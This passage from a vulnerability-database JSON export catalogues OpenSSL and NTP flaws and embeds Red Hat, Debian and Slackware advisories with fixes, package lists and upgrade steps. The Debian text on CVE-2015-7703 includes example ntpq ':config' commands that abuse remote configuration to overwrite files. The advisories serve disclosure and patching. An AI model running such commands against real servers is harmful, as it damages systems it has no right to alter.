"http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3673" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8141" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204938" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3672" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8127" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3661" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3671" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1741" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8128" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8130" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8139" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3662" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8129" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1157" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204950" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3663" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3668" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1799" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3666" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1798" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3667" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0286" }, { "db": "BID", "id": "73225" }, { "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131308" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133616" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130982" }, { "db": "PACKETSTORM", "id": "131086" }, { "db": "PACKETSTORM", "id": "131585" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "NVD", "id": "CVE-2015-0286" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-0286" }, { "db": "BID", "id": "73225" }, { "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131308" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133616" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130982" }, { "db": "PACKETSTORM", "id": "131086" }, { "db": "PACKETSTORM", "id": "131585" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "NVD", "id": "CVE-2015-0286" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-03-19T00:00:00", "db": "VULMON", "id": "CVE-2015-0286" }, { "date": "2015-03-19T00:00:00", "db": "BID", "id": "73225" }, { "date": "2015-03-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "date": "2015-08-26T01:33:25", "db": "PACKETSTORM", "id": "133318" }, { "date": "2015-04-07T15:56:20", "db": "PACKETSTORM", "id": "131308" }, { "date": "2015-03-20T05:46:26", "db": "PACKETSTORM", "id": "130933" }, { "date": "2015-03-27T20:42:44", "db": "PACKETSTORM", "id": "131044" }, { "date": "2015-09-19T15:18:18", "db": "PACKETSTORM", "id": "133616" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-03-24T17:03:13", "db": "PACKETSTORM", "id": "130982" }, { "date": "2015-03-30T21:19:09", "db": "PACKETSTORM", "id": "131086" }, { "date": "2015-04-22T20:14:53", "db": "PACKETSTORM", "id": "131585" }, { "date": "2015-07-01T05:31:53", "db": "PACKETSTORM", "id": "132518" }, { "date": "2015-03-19T22:59:04.677000", "db": "NVD", "id": "CVE-2015-0286" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2015-0286" }, { "date": "2017-05-02T03:08:00", "db": "BID", "id": "73225" }, { "date": "2016-11-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "date": "2023-11-07T02:23:23.180000", "db": "NVD", "id": "CVE-2015-0286" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "73225" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/asn1/a_type.c of ASN1_TYPE_cmp Service disruption in functions (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-001881" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Failure to Handle Exceptional Conditions", "sources": [ { "db": "BID", "id": "73225" } ], "trust": 0.3 } }
var-201510-0705
Vulnerability from variot
ntp_crypto.c in ntpd in NTP 4.x before 4.2.8p1, when Autokey Authentication is enabled, allows remote attackers to obtain sensitive information from process memory or cause a denial of service (daemon crash) via a packet containing an extension field with an invalid value for the length of its value field. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. ( Daemon crash ) There is a possibility of being put into a state. NTP is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ntp security, bug fix, and enhancement update Advisory ID: RHSA-2015:2231-04 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html Issue date: 2015-11-19 CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 CVE-2015-3405 =====================================================================
- Summary:
Updated ntp packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
It was found that because NTP's access control was based on a source IP address, an attacker could bypass source IP restrictions and send malicious control and configuration packets by spoofing ::1 addresses. (CVE-2014-9298, CVE-2014-9751)
A denial of service flaw was found in the way NTP hosts that were peering with each other authenticated themselves before updating their internal state variables. An attacker could send packets to one peer host, which could cascade to other peers, and stop the synchronization process among the reached peers. (CVE-2015-1799)
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server. (CVE-2015-3405)
A stack-based buffer overflow was found in the way the NTP autokey protocol was implemented. (CVE-2014-9297, CVE-2014-9750)
It was found that ntpd did not check whether a Message Authentication Code (MAC) was present in a received packet when ntpd was configured to use symmetric cryptographic keys. A man-in-the-middle attacker could use this flaw to send crafted packets that would be accepted by a client or a peer without the attacker knowing the symmetric key. (CVE-2015-1798)
The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav Lichvár of Red Hat.
Bug fixes:
-
The ntpd service truncated symmetric keys specified in the key file to 20 bytes. As a consequence, it was impossible to configure NTP authentication to work with peers that use longer keys. With this update, the maximum key length has been changed to 32 bytes. (BZ#1191111)
-
The ntpd service could previously join multicast groups only when starting, which caused problems if ntpd was started during system boot before network was configured. With this update, ntpd attempts to join multicast groups every time network configuration is changed. (BZ#1207014)
-
Previously, the ntp-keygen utility used the exponent of 3 when generating RSA keys. Consequently, generating RSA keys failed when FIPS mode was enabled. With this update, ntp-keygen has been modified to use the exponent of 65537, and generating keys in FIPS mode now works as expected. (BZ#1191116)
-
The ntpd service dropped incoming NTP packets if their source port was lower than 123 (the NTP port). With this update, ntpd no longer checks the source port number, and clients behind NAT are now able to correctly synchronize with the server. (BZ#1171640)
Enhancements:
-
This update adds support for configurable Differentiated Services Code Points (DSCP) in NTP packets, simplifying configuration in large networks where different NTP implementations or versions are using different DSCP values. (BZ#1202828)
-
This update adds the ability to configure separate clock stepping thresholds for each direction (backward and forward). Use the "stepback" and "stepfwd" options to configure each threshold. (BZ#1193154)
-
Support for nanosecond resolution has been added to the Structural Health Monitoring (SHM) reference clock. Prior to this update, when a Precision Time Protocol (PTP) hardware clock was used as a time source to synchronize the system clock, the accuracy of the synchronization was limited due to the microsecond resolution of the SHM protocol. The nanosecond extension in the SHM protocol now allows sub-microsecond synchronization of the system clock. (BZ#1117702)
All ntp users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1117702 - SHM refclock doesn't support nanosecond resolution 1122012 - SHM refclock allows only two units with owner-only access 1171640 - NTP drops requests when sourceport is below 123 1180721 - ntp: mreadvar command crash in ntpq 1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1 1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated 1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration 1191122 - ntpd -x steps clock on leap second 1193154 - permit differential fwd/back threshold for step vs. slew [PATCH] 1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto 1199435 - CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks 1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
aarch64: ntp-4.2.6p5-22.el7.aarch64.rpm ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm ntpdate-4.2.6p5-22.el7.aarch64.rpm
ppc64: ntp-4.2.6p5-22.el7.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm ntpdate-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-4.2.6p5-22.el7.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm ntpdate-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-4.2.6p5-22.el7.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm ntpdate-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm sntp-4.2.6p5-22.el7.aarch64.rpm
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm sntp-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm sntp-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm sntp-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-9297 https://access.redhat.com/security/cve/CVE-2014-9298 https://access.redhat.com/security/cve/CVE-2014-9750 https://access.redhat.com/security/cve/CVE-2014-9751 https://access.redhat.com/security/cve/CVE-2015-1798 https://access.redhat.com/security/cve/CVE-2015-1799 https://access.redhat.com/security/cve/CVE-2015-3405 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3 1hLTu5I/PUzWOnD8rRIlZQ== =sWdG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted package to cause ntpd to crash if:
- ntpd enabled remote configuration
- The attacker had the knowledge of the configuration password
- The attacker had access to a computer entrusted to perform remote configuration
Note that remote configuration is disabled by default in NTP.
CVE-2015-5194
It was found that ntpd could crash due to an uninitialized
variable when processing malformed logconfig configuration
commands.
CVE-2015-5195
It was found that ntpd exits with a segmentation fault when a
statistics type that was not enabled during compilation (e.g.
timingstats) is referenced by the statistics or filegen
configuration command
CVE-2015-5219
It was discovered that sntp program would hang in an infinite loop
when a crafted NTP packet was received, related to the conversion
of the precision value in the packet to double.
CVE-2015-5300
It was found that ntpd did not correctly implement the -g option:
Normally, ntpd exits with a message to the system log if the offset
exceeds the panic threshold, which is 1000 s by default. This
option allows the time to be set to any value without restriction;
however, this can happen only once. If the threshold is exceeded
after that, ntpd will exit with a message to the system log. This
option can be used with the -q and -x options.
ntpd could actually step the clock multiple times by more than the
panic threshold if its clock discipline doesn't have enough time to
reach the sync state and stay there for at least one update. If a
man-in-the-middle attacker can control the NTP traffic since ntpd
was started (or maybe up to 15-30 minutes after that), they can
prevent the client from reaching the sync state and force it to step
its clock by any amount any number of times, which can be used by
attackers to expire certificates, etc.
This is contrary to what the documentation says. Normally, the
assumption is that an MITM attacker can step the clock more than the
panic threshold only once when ntpd starts and to make a larger
adjustment the attacker has to divide it into multiple smaller
steps, each taking 15 minutes, which is slow.
CVE-2015-7691, CVE-2015-7692, CVE-2015-7702
It was found that the fix for CVE-2014-9750 was incomplete: three
issues were found in the value length checks in ntp_crypto.c, where
a packet with particular autokey operations that contained malicious
data was not always being completely validated. Receipt of these
packets can cause ntpd to crash.
CVE-2015-7701
A memory leak flaw was found in ntpd's CRYPTO_ASSOC.
CVE-2015-7703
Miroslav Lichvar of Red Hat found that the :config command can be
used to set the pidfile and driftfile paths without any
restrictions. A remote attacker could use this flaw to overwrite a
file on the file system with a file containing the pid of the ntpd
process (immediately) or the current estimated drift of the system
clock (in hourly intervals). For example:
ntpq -c ':config pidfile /tmp/ntp.pid'
ntpq -c ':config driftfile /tmp/ntp.drift'
In Debian ntpd is configured to drop root privileges, which limits
the impact of this issue.
CVE-2015-7704
If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet
from the server to reduce its polling rate, it doesn't check if the
originate timestamp in the reply matches the transmit timestamp from
its request. An off-path attacker can send a crafted KoD packet to
the client, which will increase the client's polling interval to a
large value and effectively disable synchronization with the server.
CVE-2015-7850
An exploitable denial of service vulnerability exists in the remote
configuration functionality of the Network Time Protocol. A
specially crafted configuration file could cause an endless loop
resulting in a denial of service. An attacker could provide a the
malicious configuration file to trigger this vulnerability.
CVE-2015-7852
A potential off by one vulnerability exists in the cookedprint
functionality of ntpq. A specially crafted buffer could cause a
buffer overflow potentially resulting in null byte being written out
of bounds.
CVE-2015-7855
It was found that NTP's decodenetnum() would abort with an assertion
failure when processing a mode 6 or mode 7 packet containing an
unusually long data value where a network address was expected. This
could allow an authenticated attacker to crash ntpd.
CVE-2015-7871
An error handling logic error exists within ntpd that manifests due
to improper error condition handling associated with certain
crypto-NAK packets. An unauthenticated, off-path attacker can force
ntpd processes on targeted servers to peer with time sources of the
attacker's choosing by transmitting symmetric active crypto-NAK
packets to ntpd. This attack bypasses the authentication typically
required to establish a peer association and allows an attacker to
make arbitrary changes to system time.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u6.
For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
We recommend that you upgrade your ntp packages.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several low and medium severity vulnerabilities. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz
Slackware 13.1 package: e0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: db0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz
Slackware 13.37 package: 5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz
Slackware 14.0 package: 39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: dcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz
Slackware 14.1 package: 1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz
Slackware -current package: 81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz
Slackware x86_64 -current package: 8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201510-0705", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.2.8" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.2.0" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efficientip", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "freebsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "omniti", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "watchguard", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-043) firmware rev.14.02 before" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "istorage ne single model / cluster model ver.002.08.08 previous version" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p1" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "securebranch", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "version 3.2" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.x" }, { "model": "univerge", "scope": "eq", "trust": 